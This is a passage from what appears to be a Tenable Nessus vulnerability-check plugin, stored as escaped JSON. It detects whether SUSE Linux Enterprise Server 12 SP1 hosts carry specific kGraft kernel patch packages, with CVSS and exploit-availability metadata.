script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_63-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_63-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_63-default-6-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_63-xen-6-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}